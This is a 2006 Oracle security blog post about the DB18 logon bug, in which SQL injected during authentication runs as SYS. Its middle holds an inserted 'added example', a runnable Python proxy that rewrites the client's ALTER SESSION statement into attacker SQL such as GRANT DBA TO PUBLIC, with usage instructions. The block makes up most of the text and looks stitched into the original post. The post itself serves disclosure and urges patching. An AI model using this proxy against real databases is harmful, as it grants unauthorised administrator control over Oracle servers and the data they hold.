
Pete Finnigan's Oracle security weblog



exploit code released for the DB18 AUTH_ALTER_SESSION bug - how to make any user a DBA

February 1st, 2006 by Pete

I just found this page on René Nyffenegger's website. The page is dated 24th January, so it has been there for a week or so. I have not seen anyone else pick up on it yet, though that is not to say they have not. The page is titled "On a breakable Oracle" and it describes in detail how to exploit the DB18 bug that Imperva found in the TNS / O3LOGON process. After the user's password has been verified, the Oracle client sends strings such as ALTER SESSION SET NLS_LANGUAGE='%s' to the server. The Imperva researchers discovered that these strings can be replaced by any other valid SQL statement, such as GRANT DBA TO PUBLIC. The key to the issue is that on an unpatched server these statements are executed as SYS, so whoever controls the client's side of the connection chooses what SYS executes.

René details a Perl script that uses a Perl proxy that he also provides. He creates an Oracle user with nothing but CREATE SESSION and then captures the packets sent to the database during authentication. He finds the string ALTER SESSION SET NLS_... and works out its position in the packet and the identifier that marks the end of the string. René then presents another Perl script that also uses his proxy, but this time the script intercepts the packet and replaces the ALTER SESSION SET NLS_... statement with the SQL to create a new user. He starts his proxy, injects the code, and connects with SQL*Plus as his unprivileged user. The trick is then repeated to grant DBA to the new user, and a final check in the data dictionary confirms that it has worked.
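The interception described above, as an added example in Python. This is not René's Perl script or his proxy and is not code from the original post: it is a minimal TCP proxy that sits between SQL*Plus and the listener and overwrites the client's ALTER SESSION SET NLS_... statement with attacker-chosen SQL. It assumes (nothing in the post says so) that the statement appears as plain ASCII within a single client-to-server read, that it ends at the closing single quote of its value, and that the replacement is padded with spaces to the original byte length so that no TNS/TTC length fields have to be recomputed. The sample packet is constructed for the demonstration, not captured from Oracle.

```python
"""Packet-rewriting proxy for the DB18 logon injection (added example).

Assumptions, not taken from the post: the client's ALTER SESSION SET NLS_...
statement appears as plain ASCII inside one client->server read, it ends at the
closing single quote of its value, and the replacement SQL is space-padded to
the original byte length so no TNS/TTC length fields have to be recomputed.
"""
import asyncio
from typing import Callable, Optional, Tuple

MARKER = b"ALTER SESSION SET NLS_"

# Constructed sample: a few header-like bytes, the statement, a few trailing
# bytes. This is NOT a captured Oracle packet; it only exercises the rewrite.
SAMPLE_PREFIX = b"\x00\x5a\x00\x00\x06\x00\x00\x00\x00\x00"
SAMPLE_STMT = b"ALTER SESSION SET NLS_LANGUAGE= 'AMERICAN'"
SAMPLE_SUFFIX = b"\x01\x00"
SAMPLE_PACKET = SAMPLE_PREFIX + SAMPLE_STMT + SAMPLE_SUFFIX


def find_statement(data: bytes) -> Optional[Tuple[int, int]]:
    """Locate the first ALTER SESSION SET NLS_... statement in `data`.

    Returns (start, end) with `end` one past the closing quote of the value,
    or None when the marker or its quotes are absent (for example a read that
    split the statement across two chunks).
    """
    start = data.find(MARKER)
    if start < 0:
        return None
    open_q = data.find(b"'", start)
    if open_q < 0:
        return None
    close_q = data.find(b"'", open_q + 1)
    if close_q < 0:
        return None
    return start, close_q + 1


def rewrite_statement(data: bytes, sql: str) -> bytes:
    """Overwrite the statement with `sql`, space-padded to the same length.

    Leaves `data` untouched when no statement is found; raises ValueError when
    the injected SQL is longer than the statement it replaces, because growing
    the payload would invalidate length fields this example does not parse.
    """
    span = find_statement(data)
    if span is None:
        return data
    start, end = span
    room = end - start
    payload = sql.encode("ascii")
    if len(payload) > room:
        raise ValueError(f"SQL is {len(payload)} bytes but only {room} fit")
    return data[:start] + payload.ljust(room, b" ") + data[end:]


async def _pipe(reader: asyncio.StreamReader, writer: asyncio.StreamWriter,
                transform: Optional[Callable[[bytes], bytes]] = None) -> None:
    """Copy one direction of the connection, optionally rewriting each chunk."""
    try:
        while data := await reader.read(65536):
            writer.write(transform(data) if transform else data)
            await writer.drain()
    finally:
        writer.close()


async def run_proxy(listen_host: str, listen_port: int,
                    db_host: str, db_port: int, sql: str) -> None:
    """Accept the client, connect to the real listener, inject on the way in."""
    async def handle(client_r, client_w):
        db_r, db_w = await asyncio.open_connection(db_host, db_port)
        await asyncio.gather(
            _pipe(client_r, db_w, lambda chunk: rewrite_statement(chunk, sql)),
            _pipe(db_r, client_w),
        )

    server = await asyncio.start_server(handle, listen_host, listen_port)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    # Offline demonstration on the constructed sample. To use the proxy, run
    # asyncio.run(run_proxy("127.0.0.1", 1522, "<db host>", 1521, "<sql>"))
    # and point the client's connect string at port 1522.
    print(SAMPLE_PACKET)
    print(rewrite_statement(SAMPLE_PACKET, "GRANT DBA TO PUBLIC"))
```

The proxy only rewrites the first statement in each chunk and does not buffer across reads, so a statement split over two TCP segments passes through unchanged; a tool meant for real use would reassemble the stream first. The length check matters for the same reason René had to work out the string's end marker: the injected SQL has to fit where the original statement sat.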

This is quite an elaborate way to demonstrate the issue; it can be done much more simply.

As René points out in his article, patch immediately!!
